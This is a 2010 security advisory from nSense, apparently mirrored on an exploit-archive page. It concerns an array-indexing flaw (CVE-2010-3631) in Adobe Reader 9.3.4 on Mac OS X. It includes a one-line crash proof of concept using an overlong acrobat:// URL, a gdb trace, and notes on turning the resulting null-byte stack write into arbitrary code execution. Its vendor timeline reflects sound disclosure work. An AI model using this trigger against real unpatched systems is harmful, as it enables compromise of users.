Skip to content
cyberexploits
dosmacostext

Adobe Acrobat and Reader - Array Indexing Remote Code Execution

Adobe Acrobat and Reader - Array Indexing Remote Code Execution

Published on 2010-10-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/osx/dos/15212.txt7eac4c3a
raw
       nSense Vulnerability Research Security Advisory NSENSE-2010-001

       ---------------------------------------------------------------



       Affected Vendor:    Adobe

       Affected Product:   Adobe Reader 9.3.4 for Macintosh

       Platform:           OS X

       Impact:             User assisted code execution

       Vendor response:    Patch

       Credit:             Knud / nSense

       

       Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.  Attackers   can exploit this issue to execute arbitrary code in the context of the user running the affected application.  Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.



       NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X       



       Technical details

       ---------------------------------------------------------------



       terminal 1:

       $ gdb --waitfor=AdobeReader



       terminal 2:

       $ open acrobat://`perl -e 'print "A" x 12000'`



       terminal 1:

       (gdb) cont

       [snip]

       Program received signal EXC_BAD_ACCESS, Could not access memory.

       Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2

       0x7ffa0d6a in AcroBundleThreadQuitProc ()

       (gdb) set disassembly-flavor intel

       (gdb) x/i $pc

       0x7ffa0d6a <AcroBundleThreadQuitProc+2608>:     mov    BYTE PTR

       [ebp+eax-0x420],0x0

       (gdb) i r ebp eax

       ebp            0xbfffe908       0xbfffe908

       eax            0x2eea   12010

       (gdb)



       As can be seen from the above, we control the value in eax (in

       this case 12010, the length of the acrobat:// + the 12000 A's).



       This allows us to write the null byte anywhere in memory between

       ebp-0x420 (0xBFFFE4E8) and the end of the stack.



       The behaviour may be leveraged to modify the frame pointer,

       changing the execution flow and thus permitting arbitrary code

       execution in the context of the user running the program.



       Timeline:

       Aug 10th         Contacted vendor PSIRT

       Aug 10th         Vendor response. Vulnerability reproduced.

       Aug 16th         Status update request sent to vendor

       Aug 17th         Vendor response, still investigating

       Sep 2nd          Status update request sent to vendor

       Sep 3rd          Vendor response. Working on fix

       Sep 22nd         Contacted vendor regarding patch date

       Sep 22nd         Vendor response. Confirmed patch date.

       Sep 23rd         Corrected researcher name

       Oct 1st          Vendor sent CVE identifier CVE-2010-3631

       Oct 5th          Vendor releases the patch

       Oct 6th          Advisory published



       http://www.nsense.fi                       http://www.nsense.dk







       $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.

       $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$

       $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$

       $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$

       $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P



                      D r i v e n   b y   t h e   c h a l l e n g e _

View on GitHub